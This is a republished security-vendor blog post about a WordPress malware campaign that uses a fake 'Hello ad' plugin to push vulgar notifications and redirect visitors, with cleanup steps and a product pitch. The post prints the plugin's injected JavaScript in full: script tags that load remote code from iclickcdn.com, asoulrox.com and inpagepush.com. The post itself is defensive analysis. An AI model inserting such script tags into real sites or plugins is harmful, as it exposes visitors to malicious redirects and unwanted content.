How to Fix Push Notification & Redirection Malware on WordPress

Jun 3, 2020 | Security - Internet, WordPress, and otherwise




Since the last couple of weeks, the security researchers at Astra have been tracking a push notifications malware on WordPress. This campaign has been combined with the on-going redirection campaign on WordPress websites.

A few malicious domains where redirection is happening include inpagepush[.]com, asoulrox[.]com and iclickcdn[.]com, justcannabis[.]online.

Hackers have gone one step ahead this time to make this hack campaign more sophisticated by installing a legitimate looking ‘Hello ad’ plugin to infected WordPress websites. More on it below.

Symptoms of the Push Notifications Malware – WordPress

  1. Vulgar Push Notifications: Visitors being shown malicious/vulgar push notifications when visiting your website:

    how-to-fix-push-notification-redirection-malware-on-wordpress How to Fix Push Notification & Redirection Malware on WordPress

  2. Website Redirection: Website redirection to malicious pages on clicking links from our website (which ideally should go to pages within your WordPress)

    how-to-fix-push-notification-redirection-malware-on-wordpress-1 How to Fix Push Notification & Redirection Malware on WordPress

    A few URLs where your website might be redirecting to include inpagepush[.]com, asoulrox[.]com and iclickcdn[.]com.

  3. Unknown Plugins Found: In some cases we’ve identified a new malicious plugin is added to the WordPress by the name of ‘Hello ad’.
  4. Device Specific/Mobile Only Virus: We’ve noticed that this malware hides itself really well. It won’t always send the push notifications or redirect users. The behavior is device-specific.

    Sometimes the malware shows push notifications only on mobile devices and sometimes it only redirects new users, not someone who has already opened the website earlier.

Curious Case of Malicious Hello Ad Plugin

We’ve seen ‘Hello ad’ plugin being added on these malicious websites to redirect users to hacker controlled websites.

This legitimate looking plugins adds the following malicious Javascript code to the page source:

<script>(function(s,u,z,p){s.src=u,s.setAttribute('data-zone',z),p.appendChild(s);})(document.createElement('script'),'https://iclickcdn.com/tag.min.js',3336627,document.body||document.documentElement)</script>
<script src="https://asoulrox.com/pfe/current/tag.min.js?z=3336643" data-cfasync="false" async></script>
<script type="text/javascript" src="//inpagepush.com/400/3336649" data-cfasync="false" async="async"></script>
how-to-fix-push-notification-redirection-malware-on-wordpress-2 How to Fix Push Notification & Redirection Malware on WordPress
Hello Ad plugin flagged by Astra Security’s malware scanner on an infected WordPress Website

The code added by this plugin plays an important role in making the redirection. Though, we’ve seen hackers are evolving and obfuscating this with each new campaign.

How to fix the Push Notifications Malware, Hello Ad & Redirection Hack Campaign

  1. Check the obvious places: Hackers have a few favorite places where they insert the virus/malware code. When starting to fix your WordPress, it’s best you start with these. The following files should be looked at first:
    • index.php
    • wp-content/themes/{themeName}/functions.php
    • wp-config.php
    • Core theme files
    • .htaccess
  2. Find & remove hello ad plugin: If you find this ‘legitimate looking’ plugin that you think your developer or you might have installed in the past – please un-install it as that’s not the case 🙂
  3. Removing Redirection: WordPress redirection attacks have been happening for months now. Taking care of malicious redirection hacks requires looking into the database tables, core theme files and sometimes your server’s configuration files too. Look for scripts/resources loaded from unknown URLs.

    Since redirection malware is so prevalent , we’ve made a detailed step-by-step video on fixing redirection hacks. Though hackers always keep on updating their methods to avoid coming on the radar of security companies, thee underlying principle is the same.

[embedded content][embedded content]

Hackers are always evolving their methods, exploiting vulnerabilities not known to the world and combining various exploits to create a hack. While removing the hack is one part, ensuring one never gets hacked requires something more permanent – like Astra’s Security suite 🙂

30,000 websites get hacked every single day. Are you next?

Secure your website from malware & hackers using Astra Security before it is too late.

Tags: ,

Source

WordPress Development

SEO NEWS

seo news

We’re listening.

Have something to say about this article? Share it with us on Facebook, Twitter or LinkedIn:

SHARE IT HERE:

Subscribe ToThe Weekly SEO Trade News Updates

Get the latest SEO, SEM and SMM marketing intel, tips and tricks from one of the best SEO Gurus online. 

Every Tuesday morning we send out an aggregated email listing all new posts on SEO Trade News.

Excellent! Now check your email to confirm your subscription.